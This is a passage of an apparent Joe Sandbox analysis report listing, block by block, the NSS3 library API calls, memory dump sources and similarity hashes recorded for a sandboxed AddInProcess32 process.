                                                                                        • Part of subcall function 6CCDF749: PORT_DestroyCheapArena.NSS3(?,?,?,?,?,?,00000000,00000000), ref: 6CCDF7CC
                                                                                        • Part of subcall function 6CCDF749: SECITEM_FreeItem_Util.NSS3(6CCDD984,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,6CCDEDDA,00000000), ref: 6CCDF7D7
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,00000001,00000000,6CCDD984,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEDFD
                                                                                      • PORT_Free_Util.NSS3(00000000,00000001,00000000,6CCDD984,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEE17
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000000,00000001,00000000,6CCDD984,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEDE5
                                                                                        • Part of subcall function 6CD1C6C7: PR_Lock.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C6F4
                                                                                        • Part of subcall function 6CD1C6C7: PR_Unlock.NSS3(?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000,?,?,?), ref: 6CD1C732
                                                                                        • Part of subcall function 6CD1C6C7: PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C77B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000014,00000001,00000000,6CCDD984,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 6CCDEE29
                                                                                      • PK11_HashBuf.NSS3(00000004,00000000,?,?,00000001,00000000,6CCDD984,00000000,00000000), ref: 6CCDEE43
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Item_$Alloc_Cheap$CopyDecodeDestroyErrorFreeFree_Get_HashInitK11_LockOctetQuickStringTemplate_Unlockmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1630135814-0
                                                                                      • Opcode ID: 6356ef176c817017754d835539efd615b87db2ae6b5f2406052d33bcac93050f
                                                                                      • Instruction ID: 598a817625e77aefb22465058223716608a6ff253c3c53b181a1c6ae96aa09c4
                                                                                      • Opcode Fuzzy Hash: 6356ef176c817017754d835539efd615b87db2ae6b5f2406052d33bcac93050f
                                                                                      • Instruction Fuzzy Hash: 2311AB76804705AFD7109FB5EC00ACBBBF4EF44318F11042ED69495A60FB326564DB94
                                                                                      APIs
                                                                                      • CERT_DecodeAVAValue.NSS3(?,00000000,?,6CCDC3C3,?,00000000,?,?,?,?,6CCDC27E,00000000,?,0000001F), ref: 6CCDCE17
                                                                                        • Part of subcall function 6CCE3333: PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE34D2
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000001), ref: 6CCDCE42
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_ZAlloc_Util.NSS3(00000001), ref: 6CCDCE4A
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CCDCE73
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001), ref: 6CCDCE7E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_$Arena$DecodeError_FreeFree_Item_Valuememset
                                                                                      • String ID:
                                                                                      • API String ID: 1179561027-0
                                                                                      • Opcode ID: 9a643e15bc8baf06f98df6d0818da398a5c550f11467f65081cbbae3c171da7f
                                                                                      • Instruction ID: 91482423f5950247fe61ddcb717fd32c7b42088cf682ffeea9313f34b0936e31
                                                                                      • Opcode Fuzzy Hash: 9a643e15bc8baf06f98df6d0818da398a5c550f11467f65081cbbae3c171da7f
                                                                                      • Instruction Fuzzy Hash: AB014CB34095127AD6117759EC40FCBB769EF41B68F314125F61845E90EF21F855C6F0
                                                                                      APIs
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000020,00000000,?,00000000,?,6CD26382,?,?), ref: 6CCDDD25
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,?,00000000,?,6CD26382,?,?), ref: 6CCDDD37
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,6CD263CA,00000000,?,00000000,?,6CD26382,?,?), ref: 6CCDDD47
                                                                                        • Part of subcall function 6CD1BB68: PORT_ArenaAlloc_Util.NSS3(?,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1BB8E
                                                                                      • CERT_CopyName.NSS3(?,0000000C,6CD2642A,6CD26382,?,?), ref: 6CCDDD5F
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000014,6CD26406,?,?,?,6CD26382,?,?), ref: 6CCDDD77
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Copy$Alloc_ArenaItem_$Error_Name
                                                                                      • String ID:
                                                                                      • API String ID: 2095309287-0
                                                                                      • Opcode ID: 40db93f96093fab1789a92fb0e1857ea7fbe58a8f412e0250eacaf91d50cc478
                                                                                      • Instruction ID: 718991d8eca577ebbb3ba883a05b86c6f4e38bd3c74ae8d46b7c0d38bbb6a2a4
                                                                                      • Opcode Fuzzy Hash: 40db93f96093fab1789a92fb0e1857ea7fbe58a8f412e0250eacaf91d50cc478
                                                                                      • Instruction Fuzzy Hash: 1F01A7736085157BDB019A55AC40FDB33AC9F89264B050177FE05CBA05FB21FA09CAB5
                                                                                      APIs
                                                                                      • CERT_FindCertExtension.NSS3(?,0000005C,?,00000001,6CCDD994,00000000,?,?,00000000,?,6CCDD994,00000000), ref: 6CCE2D2A
                                                                                      • CERT_DecodeOidSequence.NSS3(?,00000001,6CCDD994,00000000,?,?,00000000,?,6CCDD994,00000000), ref: 6CCE2D3A
                                                                                        • Part of subcall function 6CCE2AB2: PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2ABF
                                                                                        • Part of subcall function 6CCE2AB2: PORT_ArenaZAlloc_Util.NSS3(00000000,00000008,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2ACE
                                                                                        • Part of subcall function 6CCE2AB2: SECITEM_CopyItem_Util.NSS3(00000000,?,6CCDE92E,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2AE5
                                                                                        • Part of subcall function 6CCE2AB2: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CD5FC68,?,?,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2AFC
                                                                                      • SECOID_FindOIDTag_Util.NSS3(?,00000001,6CCDD994,00000000,?,?,00000000,?,6CCDD994,00000000), ref: 6CCE2D53
                                                                                        • Part of subcall function 6CD29121: SECOID_FindOID_Util.NSS3(?,?,6CD18C2D,?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD29127
                                                                                      • CERT_DestroyUserNotice.NSS3(00000000,00000001,6CCDD994,00000000,?,?,00000000,?,6CCDD994,00000000), ref: 6CCE2D6D
                                                                                      • PORT_Free_Util.NSS3(00000000,00000001,6CCDD994,00000000), ref: 6CCE2D7C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Find$DecodeItem_$Alloc_ArenaArena_CertCopyDestroyExtensionFree_NoticeQuickSequenceTag_User
                                                                                      • String ID:
                                                                                      • API String ID: 953718273-0
                                                                                      • Opcode ID: fbd30fa3af038dfbea89b95590b696c797b8238671f00c08bbb7f94d6db082ba
                                                                                      • Instruction ID: 4aad7e75ff8b16e4d15308eb076ea4c50b6453e2da60f878927ee816bf38f82a
                                                                                      • Opcode Fuzzy Hash: fbd30fa3af038dfbea89b95590b696c797b8238671f00c08bbb7f94d6db082ba
                                                                                      • Instruction Fuzzy Hash: F9014C32D0571BABD7205E949C98BDA7778EF0A618F2001BADA0496A50F731CB58C180
                                                                                      APIs
                                                                                      • PORT_ZAlloc_Util.NSS3(00000018,FFFFE001,00000001,00000400,?,6CD2F206,00000001,00000016,?,?,00000001,?,6CD2E515,00000001,00000001), ref: 6CD2ED6F
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • PORT_Alloc_Util.NSS3(6CD4BECC,FFFFE001,00000001,00000400,?,6CD2F206,00000001,00000016,?,?,00000001,?,6CD2E515,00000001,00000001), ref: 6CD2ED7E
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_Free_Util.NSS3(00000000,FFFFE001,00000001,00000400,?,6CD2F206,00000001,00000016,?,?,00000001,?,6CD2E515,00000001,00000001), ref: 6CD2ED8C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,FFFFE001,00000001,00000400,?,6CD2F206,00000001,00000016,?,?,00000001,?,6CD2E515,00000001,00000001), ref: 6CD2ED97
                                                                                      • memcpy.VCRUNTIME140(00000000,00000050,6CD4BECC,FFFFE001,00000001,00000400,?,6CD2F206,00000001,00000016,?,?,00000001,?,6CD2E515,00000001), ref: 6CD2EDAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Error$CallocError_Free_Mallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 4056962211-0
                                                                                      • Opcode ID: 96e50cc9a1078adc0e1770fb2ed456a293f41f290549ec9bfb9a33c4fe169d0a
                                                                                      • Instruction ID: 7653f8dc3dbaa7197ea60024f1554116ccdd951c71baab276ba2ca8cc844d87d
                                                                                      • Opcode Fuzzy Hash: 96e50cc9a1078adc0e1770fb2ed456a293f41f290549ec9bfb9a33c4fe169d0a
                                                                                      • Instruction Fuzzy Hash: C4117071604B15AFC714DF78E84099AB7E4FF48328B10862EF95887B60DB34E9148BA0
                                                                                      APIs
                                                                                        • Part of subcall function 6CD46AC0: PR_GetIdentitiesLayer.NSS3(?,?,6CD2E3A3,?), ref: 6CD46ACC
                                                                                        • Part of subcall function 6CD46AC0: PORT_SetError_Util.NSS3(FFFFE891,?), ref: 6CD46ADF
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD45F10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$IdentitiesLayer
                                                                                      • String ID:
                                                                                      • API String ID: 1146253650-0
                                                                                      • Opcode ID: 9bf8c7c7e1926bbb7ed45c6080e7e31d0be4c6fd8eb97f03b7c86eb7882048dc
                                                                                      • Instruction ID: 6b3bdbdc5158e6dbd556504867ebdc639572da36206f06bc7906c2449c293c5d
                                                                                      • Opcode Fuzzy Hash: 9bf8c7c7e1926bbb7ed45c6080e7e31d0be4c6fd8eb97f03b7c86eb7882048dc
                                                                                      • Instruction Fuzzy Hash: 5C11A131009B01EBD7214F26DC84A87BBF5EF42338F24871AF79951AB0EB31A8558A95
                                                                                      APIs
                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000001,00000000,?,6CD10F0C,?,00000000,?,?), ref: 6CD08FCA
                                                                                      • PORT_ZAlloc_Util.NSS3(00000000,?,00000001,00000000,?,6CD10F0C,?,00000000,?,?), ref: 6CD08FEB
                                                                                      • PORT_Free_Util.NSS3(00000000,?,00000001,00000000,?,6CD10F0C,?,00000000,?,?), ref: 6CD08FFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_$Free_
                                                                                      • String ID:
                                                                                      • API String ID: 2292727986-0
                                                                                      • Opcode ID: f6566b0cce40720bba6af1b8a7b3719c409da8ad112471c5dd022f693b1ea60a
                                                                                      • Instruction ID: ffd1a6327798adf4ba0bcf118a9b51a5e82a7679f23238558be7bd690b867231
                                                                                      • Opcode Fuzzy Hash: f6566b0cce40720bba6af1b8a7b3719c409da8ad112471c5dd022f693b1ea60a
                                                                                      • Instruction Fuzzy Hash: 3401A272304601ABCB149F6EDC40987BBE9EF897647198429F90DCBA30E631D80087B0
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD9DB9
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CCD9DC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentThread$Error
                                                                                      • String ID:
                                                                                      • API String ID: 698467719-0
                                                                                      • Opcode ID: 4ec6e8234806ba777cf9eecdb7207e53c8a6b7a39430a2cba5fb51e8dec54c23
                                                                                      • Instruction ID: 9afd34a7752c9cfb1b46335559764f78eb8f1d14894661430efd1fdb9f5d5abb
                                                                                      • Opcode Fuzzy Hash: 4ec6e8234806ba777cf9eecdb7207e53c8a6b7a39430a2cba5fb51e8dec54c23
                                                                                      • Instruction Fuzzy Hash: 34017B364086016DCB102FB9AC50A963764AF013BCF25475AF62959EE1FF22F005C680
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CD2BE41
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?), ref: 6CD2BE87
                                                                                        • Part of subcall function 6CD2CC9C: PORT_SetError_Util.NSS3(FFFFE005,?,6CD2C538,00000000,00000000,?,00000000,00000000,00000000,?,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2CCAA
                                                                                      • NSS_CMSSignedData_SetDigestValue.NSS3(?,00000000,00000000,?), ref: 6CD2BE69
                                                                                        • Part of subcall function 6CD2C84D: PORT_SetError_Util.NSS3(FFFFE005,?,?,?,6CD2BE6E,?,00000000,00000000,?), ref: 6CD2C860
                                                                                      • PT_FPrintStats.NSS3(?,?), ref: 6CD2BE79
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD2BE94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$Arena$Data_DigestLockMark_PrintRelease_SignedStatsUnlockValue
                                                                                      • String ID:
                                                                                      • API String ID: 1142014490-0
                                                                                      • Opcode ID: 5c24785ec4b7721428d4c7c3aadcbc44f187e1a369fbdfb1568296e15cf9973f
                                                                                      • Instruction ID: 1f9a444fdc8208a6304b809d3d33a8b37542fd7ae72044e44efb59bad190de25
                                                                                      • Opcode Fuzzy Hash: 5c24785ec4b7721428d4c7c3aadcbc44f187e1a369fbdfb1568296e15cf9973f
                                                                                      • Instruction Fuzzy Hash: 9E01F732408A04BBDB012F19DC00EFF37689F8166CF108115FF2955BB0F779E50556A1
                                                                                      APIs
                                                                                      • PR_ExplodeTime.NSS3(?,?,?), ref: 6CD1CDCA
                                                                                      • PORT_Alloc_Util.NSS3(00000100), ref: 6CD1CDD6
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PR_FormatTime.NSS3(00000000,00000100,?,?), ref: 6CD1CDEB
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD1CDF9
                                                                                      • PORT_SetError_Util.NSS3(FFFFE003,00000000), ref: 6CD1CE05
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ErrorTime$Alloc_Error_ExplodeFormatFree_Malloc
                                                                                      • String ID:
                                                                                      • API String ID: 940347068-0
                                                                                      • Opcode ID: 305f8ad7286cf93878b439c5ca885943ecfb83dcd66ee74848a8153aa4c85e8e
                                                                                      • Instruction ID: fca96d7acea259777e06b4224fc62720ecb81921c27d3f4235f753bc933ecdd6
                                                                                      • Opcode Fuzzy Hash: 305f8ad7286cf93878b439c5ca885943ecfb83dcd66ee74848a8153aa4c85e8e
                                                                                      • Instruction Fuzzy Hash: 8601A7326051186BEB01ABA49C44DEF77BCDF89614B104065FE0593610EB35DD1487F5
                                                                                      APIs
                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,?,00000000,?,6CCE2EF6,?,?,00000004,?,00000000,?,6CCE219E,00000000,?,?), ref: 6CCE2F0D
                                                                                        • Part of subcall function 6CCE3333: PORT_SetError_Util.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE34D2
                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,?,?,00000000,?,6CCE2EF6,?,?,00000004,?,00000000,?,6CCE219E,00000000,?), ref: 6CCE2F17
                                                                                        • Part of subcall function 6CCE3333: PORT_InitCheapArena.NSS3(?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE33E7
                                                                                        • Part of subcall function 6CCE3333: SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,00000000,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE33F8
                                                                                        • Part of subcall function 6CCE3333: PORT_DestroyCheapArena.NSS3(?,?,?,?,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E,?), ref: 6CCE3408
                                                                                      • SECITEM_CompareItem_Util.NSS3(00000000,00000000,00000000,00000000,?,?,00000000,?,6CCE2EF6,?,?,00000004,?,00000000,?,6CCE219E), ref: 6CCE2F4C
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,?,?,00000000,?,6CCE2EF6,?,?,00000004,?,00000000,?,6CCE219E,00000000,?), ref: 6CCE2F59
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000000,00000001,?,?,00000000,?,6CCE2EF6,?,?,00000004,?,00000000,?,6CCE219E), ref: 6CCE2F61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_$Decode$ArenaCheapFreeValue$CompareDestroyError_InitQuick
                                                                                      • String ID:
                                                                                      • API String ID: 2247491371-0
                                                                                      • Opcode ID: 761060f5b5ae8ae2ae77220cd9771ee97cc26b1a6449a3eceaea9e2b61425b35
                                                                                      • Instruction ID: a6784217c1cd34ae10f1900d450d206ff2ae3d414fa7c663e631371d13c668c9
                                                                                      • Opcode Fuzzy Hash: 761060f5b5ae8ae2ae77220cd9771ee97cc26b1a6449a3eceaea9e2b61425b35
                                                                                      • Instruction Fuzzy Hash: 55F0F9325066227AAF1056356C84AAB7359FF4B6787108629F83C46F90FF21D84681E5
                                                                                      APIs
                                                                                      • PR_Init.NSS3(00000000,?,00000000,?,6CCCBB35,00000002,00000000,?,00000000,00000000), ref: 6CCD4DC7
                                                                                      • memset.VCRUNTIME140(?,00000000,00000070,00000000,?,00000000,?,6CCCBB35,00000002,00000000,?,00000000,00000000), ref: 6CCD4DDA
                                                                                      • htons.WSOCK32(00000000,00000000,?,00000000,?,6CCCBB35,00000002,00000000,?,00000000,00000000), ref: 6CCD4DEB
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000,00000000,00000000,?,00000000,?,6CCCBB35,00000002,00000000,?,00000000,00000000), ref: 6CCD4E08
                                                                                      • htonl.WSOCK32(00000000,00000000,00000000,?,00000000,?,6CCCBB35,00000002,00000000,?,00000000,00000000), ref: 6CCD4E1C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
